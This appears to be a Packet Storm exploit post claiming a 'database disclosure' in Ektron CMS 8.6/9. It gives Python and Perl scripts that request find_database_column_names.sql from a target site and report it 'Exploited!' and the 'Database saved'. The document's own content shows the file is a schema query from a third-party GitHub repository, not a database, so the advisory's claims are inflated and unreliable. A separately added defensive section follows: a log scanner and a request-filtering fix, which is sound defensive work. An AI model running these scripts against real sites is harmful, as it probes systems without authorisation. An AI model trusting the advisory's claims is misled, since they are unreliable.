Ektron CMS 9 Database Disclosure

02 Apr 2019 | Reported by KingSkrupellos | Type: packetstorm | Source: packetstormsecurity.com

Code
`###########################################################################  
  
# Exploit Title : Ektron CMS 9 Database Disclosure Exploit  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 02/04/2019  
# Vendor Homepage : ektron.com  
episerver.com/products/platform/ektron/  
# Software Download Link : github.com/whanrott/Ektron_sql_scripts/archive/master.zip  
# Software Information Link : ektron.com/Products/Web-CMS/Web-Content-Management/  
github.com/whanrott/Ektron_sql_scripts  
cmsmatrix.org/matrix/cms-matrix/ektron-cms  
# Software Affected Versions : 8.6 and 9  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Vulnerability Type :   
CWE-200 [ Information Exposure ]  
CWE-538 [ File and Directory Information Exposure ]  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
  
###########################################################################  
  
# Description about Software :  
***************************  
Ektron Web Content Management System (CMS) is the platform of choice for more than 3,700 global companies.

Episerver Digital Experience Cloud™: The only platform that puts Digital Content, Commerce and Marketing in one screen.

Create, deploy, and manage enterprise-scale, global, personalized websites. Empower users, designers, and developers to work in parallel, speeding time-to-web. Make content updates directly on the site using an intuitive browser-based editor. Create site wireframes, ensuring global brand consistency. Speed development using Ektron's Framework API, pre-built .NET controls, and standard development tools like Microsoft Visual Studio.
  
###########################################################################  
  
# Impact :  
***********  
* The product stores sensitive information in files or directories that are accessible to actors outside of the intended control sphere.

* An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information.

* This information is highly sensitive and should not be found on a production system.
  
Information :  
*************  
Ektron SQL Scripts :  
  
Simple SQL scripts for examining the database of Ektron CMS v9.  
  
Scripts :

Script Name                       Purpose
find_all_users.sql                List all users with last login date
find_content_and_folder.sql       List all content, showing folder. Filter by multiple criteria
find_content_history.sql          Show content item history
find_database_column_names.sql    Query the database structure to find matching tables and column names
find_folder_permissions.sql       List folder permissions
  
###########################################################################  
  
Files :  
*****  
/find_all_users.sql  
/find_content_alias_and_template.sql  
/find_content_and_folder.sql  
/find_content_history.sql  
/find_database_column_names.sql  
/find_folder_permissions.sql  
/find_menu_items.sql  
/find_meta_course_accreditation.sql  
/find_meta_course_combinations.sql  
/find_mismatched_content.sql  
/where_is_this_content_used.sql  
  
Information [ find_database_column_names.sql ]  
*********************************************  
/* look for table column names */  
  
--USE <database name>;  
  
SELECT  
TABLE_NAME  
,COLUMN_NAME  
,DATA_TYPE  
,CHARACTER_MAXIMUM_LENGTH  
FROM  
INFORMATION_SCHEMA.COLUMNS  
WHERE  
-- COLUMN_NAME LIKE '%%'  
--AND TABLE_NAME LIKE '%_tbl'  
--AND (TABLE_NAME LIKE '%%' OR COLUMN_NAME LIKE '%template%')  
--AND  
(  
COLUMN_NAME LIKE '%%' OR TABLE_NAME LIKE '%%'  
)  
AND COLUMN_NAME LIKE '%%'  
AND TABLE_NAME NOT LIKE '%_tracking'  
ORDER BY  
TABLE_NAME, COLUMN_NAME  
;  
  
###########################################################################  
  
# Database Disclosure Information Exposure Exploit 1 :  
***********************************************  
#!/usr/bin/python  
import string  
import re  
from urllib2 import Request, urlopen  
disc = "/find_database_column_names.sql"  
url = raw_input ("URL: ")  
req = Request(url+disc)  
rta = urlopen(req)  
print "Result"  
html = rta.read()  
rdo = str(re.findall("resources.*=*", html))  
print rdo  
exit  
  
###########################################################################  
  
# Database Disclosure Information Exposure Exploit 2 :  
***********************************************  
#!/usr/bin/perl -w  
# Author : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
  
use LWP::Simple;  
use LWP::UserAgent;  
  
system('cls');  
system('Ektron CMS V.9 Database Disclosure Exploit');  
system('color a');  
  
  
if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;  
  
$File="find_database_column_names.sql";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Wait Please Dear Hacker!!! \n\n";  
  
my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/find_database_column_names.sql");  
  
if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/find_database_column_names.sql\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}  
  
###########################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
###########################################################################  
`
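
A defender-side check for the exposure described in the advisory, as an added example that is not part of the original advisory or of the Ektron_sql_scripts project: it scans an IIS W3C extended log for `.sql` requests answered with a 2xx status and marks the ones named in the advisory's Files list. The W3C log format, the columns in the `#Fields:` line and the sample log lines are assumptions constructed for illustration.

```python
"""Flag successful requests for exposed .sql files in IIS W3C logs (added example)."""
from collections import defaultdict

# File names taken from the advisory's "Files" list.
ADVISORY_FILES = {
    "find_all_users.sql", "find_content_alias_and_template.sql",
    "find_content_and_folder.sql", "find_content_history.sql",
    "find_database_column_names.sql", "find_folder_permissions.sql",
    "find_menu_items.sql", "find_meta_course_accreditation.sql",
    "find_meta_course_combinations.sql", "find_mismatched_content.sql",
    "where_is_this_content_used.sql",
}

# Constructed sample log (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 8.5
#Fields: date time cs-method cs-uri-stem c-ip sc-status
2019-04-02 10:01:11 GET /default.aspx 192.0.2.10 200
2019-04-02 10:01:12 GET /find_database_column_names.sql 198.51.100.7 200
2019-04-02 10:01:13 GET /Find_All_Users.SQL 198.51.100.7 404
2019-04-02 10:01:14 GET /scripts/backup.sql 203.0.113.5 200
2019-04-02 10:01:15 HEAD /find_menu_items.sql 198.51.100.7 200
"""


def served_sql_files(log_text):
    """Return {client_ip: [(uri, listed_in_advisory), ...]} for .sql requests answered 2xx."""
    fields, hits = [], defaultdict(list)
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column order is declared per log file
            continue
        if not line or line.startswith("#") or not fields:
            continue  # skip other directives and rows seen before any #Fields line
        row = dict(zip(fields, line.split()))
        uri = row.get("cs-uri-stem", "")
        status = row.get("sc-status", "")
        if uri.lower().endswith(".sql") and status.startswith("2"):
            name = uri.rsplit("/", 1)[-1].lower()
            hits[row.get("c-ip", "-")].append((uri, name in ADVISORY_FILES))
    return dict(hits)


if __name__ == "__main__":
    for ip, items in served_sql_files(SAMPLE_LOG).items():
        for uri, listed in items:
            print(ip, uri, "advisory file" if listed else "other .sql file")
```

Any hit means the web server handed the script out as static content; the fix is to remove the `.sql` files from the web root or deny the extension (IIS request filtering supports this with `fileExtensions` entries set to `allowed="false"`).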
